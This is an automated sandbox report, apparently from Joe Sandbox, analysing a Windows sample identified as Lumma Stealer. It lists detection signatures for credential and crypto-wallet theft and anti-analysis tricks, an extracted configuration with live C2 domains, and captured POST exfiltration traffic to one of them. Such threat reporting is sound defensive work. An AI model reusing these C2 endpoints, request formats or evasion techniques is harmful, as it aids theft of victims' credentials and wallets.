Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579894
MD5:d41882715738e10a16d164da8514aa5a
SHA1:3d4a8721cc0d10f276cd462447a579901a42c0f4
SHA256:7a7868522449e85d36886dd0e2108bb4652f71addc7b28d0a0cec2c1c5eaa2a8
Tags:exeuser-jstrosch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D41882715738E10A16D164DA8514AA5A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "sordid-snaked.cyou", "hypothesizys.click", "immureprech.biz", "wrathful-jammy.cyou"], "Build id": "VisOTZ--tester"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1810057731.0000000001A95000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1804616185.0000000001A93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 7 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T14:28:02.082617+010020283713Unknown Traffic192.168.2.449730104.21.95.235443TCP
                2024-12-23T14:28:04.136873+010020283713Unknown Traffic192.168.2.449731104.21.95.235443TCP
                2024-12-23T14:28:06.625353+010020283713Unknown Traffic192.168.2.449732104.21.95.235443TCP
                2024-12-23T14:28:08.953034+010020283713Unknown Traffic192.168.2.449733104.21.95.235443TCP
                2024-12-23T14:28:11.426844+010020283713Unknown Traffic192.168.2.449734104.21.95.235443TCP
                2024-12-23T14:28:14.259015+010020283713Unknown Traffic192.168.2.449735104.21.95.235443TCP
                2024-12-23T14:28:16.716616+010020283713Unknown Traffic192.168.2.449736104.21.95.235443TCP
                2024-12-23T14:28:20.522470+010020283713Unknown Traffic192.168.2.449740104.21.95.235443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T14:28:02.901923+010020546531A Network Trojan was detected192.168.2.449730104.21.95.235443TCP
                2024-12-23T14:28:04.994718+010020546531A Network Trojan was detected192.168.2.449731104.21.95.235443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T14:28:02.901923+010020498361A Network Trojan was detected192.168.2.449730104.21.95.235443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T14:28:04.994718+010020498121A Network Trojan was detected192.168.2.449731104.21.95.235443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T14:28:15.017424+010020480941Malware Command and Control Activity Detected192.168.2.449735104.21.95.235443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exe.6956.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "debonairnukk.xyz", "effecterectz.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "sordid-snaked.cyou", "hypothesizys.click", "immureprech.biz", "wrathful-jammy.cyou"], "Build id": "VisOTZ--tester"}
                Source: file.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: hypothesizys.click
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1683882185.0000000001990000.00000004.00001000.00020000.00000000.sdmpString decryptor: VisOTZ--tester
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.95.235:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, 00000000.00000002.1887809972.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.95.235:443
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Source: Malware configuration extractorURLs: hypothesizys.click
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.95.235:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.95.235:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F9TYHS8EEI2Z7IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18140Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S6XMD7B3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LDIO675GWNWWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S4I50N14User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1203Host: hypothesizys.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KR1XF4FP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572666Host: hypothesizys.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: hypothesizys.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hypothesizys.click
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: file.exe, 00000000.00000003.1875009517.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886443307.0000000001A8F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810157737.0000000001A7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: file.exe, 00000000.00000003.1780693037.0000000004005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809947662.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831453164.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810197735.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831064343.0000000003FCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/
                Source: file.exe, 00000000.00000003.1874909358.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1848707210.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/1D
                Source: file.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/AD
                Source: file.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/YD
                Source: file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732330812.0000000001A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/_
                Source: file.exe, file.exe, 00000000.00000003.1874909358.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890130414.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1848707210.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886997867.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1831258871.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804369428.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756878942.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890130414.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757760920.0000000003FCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886687617.0000000001A43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1780142241.0000000003FCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1886687617.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732560961.0000000001A2B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757310603.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804616185.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/api
                Source: file.exe, 00000000.00000003.1756878942.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756984738.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/e
                Source: file.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/iD#=
                Source: file.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click/o
                Source: file.exe, file.exe, 00000000.00000003.1732560961.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1874448498.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1889925037.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809906220.0000000001A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click:443/api
                Source: file.exe, 00000000.00000003.1874448498.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1885745267.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1889925037.0000000001A15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hypothesizys.click:443/api.default-release/key4.dbPK
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: file.exe, 00000000.00000003.1734118682.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: file.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: file.exe, 00000000.00000003.1734118682.0000000004021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756821918.000000000401A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1734266384.000000000401A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: file.exe, 00000000.00000003.1734266384.0000000003FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: file.exe, 00000000.00000003.1734118682.0000000004021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1756821918.000000000401A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1734266384.000000000401A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: file.exe, 00000000.00000003.1734266384.0000000003FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
